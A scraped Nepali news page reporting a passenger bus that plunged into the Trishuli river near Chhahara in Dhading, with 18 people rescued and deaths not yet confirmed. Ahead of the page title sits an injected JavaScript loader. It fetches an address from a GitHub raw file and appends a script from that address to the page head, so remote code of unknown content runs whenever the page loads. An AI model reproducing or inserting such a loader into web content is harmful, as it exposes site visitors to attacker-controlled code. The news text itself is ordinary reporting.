;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); धादिङको छहरानजिकै त्रिशुलीमा बस खस्यो – जुनेली न्युज
बुधबार, बैशाख ४, २०८२
  • होमपेज
  • धादिङको छहरानजिकै त्रिशुलीमा बस खस्यो
Breaking News

धादिङको छहरानजिकै त्रिशुलीमा बस खस्यो

काठमाडौं । पृथ्वी राजमार्ग अन्तर्गत धादिङको गजुरी गाउँपालिका-२ , छहराबाट यात्रुबाहक बस त्रिशुली नदीमा खसेको छ । काठमाडौंबाट  पोखरा जाँदै गरेको बस बुधबार बिहान त्रिशुलीमा खसेको हो ।  हालसम्म १८ जनाको नदीबाट उद्धार गरिएको छ । कति मृत्यू भएकाे एकीन विवरण आएकाे छैन |

जिल्ला प्रहरी कार्यालय धादिङका अनुसार बसको पछाडिको ९९५२ नम्बरमात्रै देखिएको छ । प्रहरी कार्यालय धादिङका अनुसार घाइतेहरुको गजुरी सामुदायिक अस्पतालमा उपचार भइरहेको छ | भने दुर्घटना बारे थप विवरण आउन बाँकी छ । उद्धार टोली घटनास्थलमा परिचालित भइसकेको प्रहरीले जनाएको छ ।

 

फेसबुक प्रतिक्रियाहरु